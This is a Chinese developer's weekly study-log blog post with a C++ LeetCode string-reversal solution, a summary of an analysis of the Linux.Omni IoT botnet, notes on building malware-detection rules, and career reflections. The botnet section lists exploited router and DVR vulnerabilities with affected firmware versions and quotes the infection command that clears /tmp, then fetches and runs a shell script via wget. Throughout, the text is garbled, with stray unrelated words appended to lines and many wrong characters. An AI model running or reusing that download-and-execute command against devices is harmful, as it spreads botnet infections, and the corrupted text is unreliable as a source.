【ARTS】01_06_左耳听风-20181217~1223

ARTS:

  • Algrothm: leetcode算法题目
  • Review: 阅读而且点评一篇英文技术文章
  • Tip/Techni: 学习一个技术技巧
  • Share: 分享一篇有观点和思考的技术文章

Algorithm

【leetcode】Reverse String

https://leetcode.com/problems/reverse-string/html

1)problem

编写一个以字符串做为输入并逆转字符串的函数。linux

2)answer

字符串大于0,就从最末尾开始取值。ios

3)solution

#include "pch.h"
#include <stdio.h>
#include <string>
#include <iostream>
#include <algorithm>
using std::string;


class Solution {
public:
    string reverseString(string s) {

        string result = "";
        for (int i =s.length()-1;i>=0 ; i--)
        {
            result += s.at(i);
        }

        return result;

    }
};

int main()
{
    // 使用内容
    Solution nSolution;
    nSolution.reverseString("abcdef");
}

Review

【漏洞挖掘】Linux.Omni IoT 僵尸网络恶意软件分析

1)场景

Linux下针对IoT威胁的分类和分析。算法

2)问题难点

使用什么方式对IOT设备进行攻击。安全

3)解决问题的方法

Linux.Omni因其感染库包含了许多漏洞(总共11种)bash

4)方法细节

利用的IoT设备漏洞cookie

  • Vacron

VACRON网络录像机中"board.cgi"参数存在代码注入的漏洞。网络

img

  • Netgear – CVE-2016-6277

经过对路由器“cgi-bin/”目录进行GET请求而进行的远程代码执行攻击。函数

img

  • D-Link – OS-Command Injection via UPnP

IoTReaper使用的是hedwig.cgi参数cookie溢出的漏洞,Omni使用的则是UPnP端口漏洞。工具

Omni的POST请求以下:

img

咱们能够找到对应的二进制命令:

img

存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。

  • CCTV-DVR

与“/language/Swedish”资源相关联,容许远程执行代码。

img

  • D-Link – HNAP

经过CAPTCHA绕过登陆,并容许外部攻击者执行远程代码。

img

D-Link路由器有此漏洞的版本:

DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA

  • TR-069 – SOAP

漏洞利用以下:

img

二进制中的指令:

img

  • Huawei Router HG532 – Arbitrary Command Execution

在华为HG532路由器中,能够经过修改HTTP请求来利用配置文件验证错误的漏洞。

img

此漏洞已在分析Okiru/Satori僵尸网络的文章中(Analysis of Linux.Okiru)被检测及分析。

  • Netgear – Setup.cgi RCE

Netgear路由器DGN1000 1.1.00.48固件中存在容许远程执行代码而无需事先验证的漏洞。

img

  • Realtek SDK

使用Realtek SDK和miniigd守护程序的不一样设备都存在经过UPnP SOAP接口的命令注入漏洞。

img

  • GPON

GPON路由器的最新漏洞

img

5)总结

尽管攻击方式多种多样, 在受感染设备上运行的命令是一致的:

cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}

下载的文件是bash脚本,它依据受感染设备的不一样构架来下载样本。

img

Tip

【安全开发】恶意代码检查工具1

1)场景

网络安全设备报警,某台机器中毒。

2)问题难点

如何快速找到机器里的恶意代码相关进程、文件。

3)解决思路

经过搜索国内外恶意代码公开的分析报告,分析样本,提取行为特征。

4)方法细节

逆向分析收集到的样本,而后提取规则:

文件规则:文件路径、Yara规则

注册表:注册表路径、子项、类型、值

内存:内存特征码、内存类型、内存保护属性、内存块大小范围

遍历内存代码:

【恶意代码】恶意代码代码特征提取
https://www.cnblogs.com//17bdw/p/10181207.html

5)总结

只须要搞懂两个知识点:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 结构体中RegionSize字段的含义。

Share

【业务能力】极客时间-左耳听风-开篇词1

1)场景

利用技术变现思路。

2)问题难点

在长时间加班状况下,如何保持学习。

3)解决思路

以为仍是要从头至尾看完一本书,不容易被分神。
白天工做回家就不想动了。

4)方法细节

【技术思路】极客时间-左耳听风-开篇词1
http://www.javashuo.com/article/p-pbmkicar-gp.html

5)总结

用技术变现:

独立思考
保持学习力、洞察力
寻找合适的环境
具有动手能力。
关注技术付费点
善于提高经验
输出价值观
朋友圈
拥有技术领导力
相关文章
相关标签/搜索